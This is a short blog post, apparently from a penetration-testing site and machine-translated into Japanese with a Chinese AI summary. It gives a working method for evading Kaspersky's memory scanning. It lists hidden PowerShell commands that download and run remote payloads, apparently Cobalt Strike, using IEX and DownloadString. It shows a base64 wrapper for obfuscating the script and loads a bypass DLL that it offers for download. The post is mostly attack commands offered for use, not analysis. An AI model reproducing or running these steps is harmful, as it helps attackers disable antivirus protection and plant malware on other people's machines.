干掉カスペルスキーのバックグラウンドメモリスキャンDLL

2023年3月22日#渗透测试149

AI 翻訳

この記事はAIを通じて英語から日本語に翻訳されました。原文を表示

AI が生成した要約

这段文本描述了一个绕过卡巴斯基杀毒软件的方法。首先，通过启动一个powershell来执行一段代码，从指定的网址下载内容并保存到本地。然后，将下载的内容进行base64编码，并替换到一个名为demo.txt的文件中。接下来，执行另一段powershell代码，通过加载一个名为BypassKarpersky.dll的文件来绕过卡巴斯基杀毒软件，并从指定的网址下载另一个文件。最后，将该EXE文件放到服务器上执行。无论卡巴斯基是否进行网页防火墙询问或通知，都可以成功执行命令。即使后台扫描到并清除了内存，也能继续执行命令。

#

BypassKarpersky.zip
‍

0x01#

首先 CS 需要启一个 powershell，

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxx/aa'))"

访问网页复制保存到本地，编码 base64 之后然后替换如下内容：
demo.txt 内容：

$Encryption = @' ここに ps1 全体の base64 エンコード結果を入力 '@ $Decryption = [System.Text.Encoding]::UTF8.GetString ([System.Convert]::FromBase64String ($Encryption)) IEX $Decryption

0x02#

powershell.exe -exec bypass -Command "& {Add-Type -Path .\BypassKarpersky.dll;[BypassKarpersky.Class1]::chaching();IEX([Net.Webclient]::new().DownloadString('http://xxxxx/1.txt'))}"
‍
その EXE をサーバーに配置し、実行します。
‍
ローカル：
powershell.exe -exec bypass -Command "& {Add-Type -Path .\BypassKarpersky.dll;[BypassKarpersky.Class1]::chaching();.\txt.ps1}" ‍
‍

0x03#

効果

‍

‍

PS#

もしカスペルスキーのウェブファイアウォールが尋ねる場合は拒否されますが、通知の場合は影響を受けません。正常にオンラインになります。

‍
バックグラウンドでメモリをスキャンしても、コマンドを実行することができます。

‍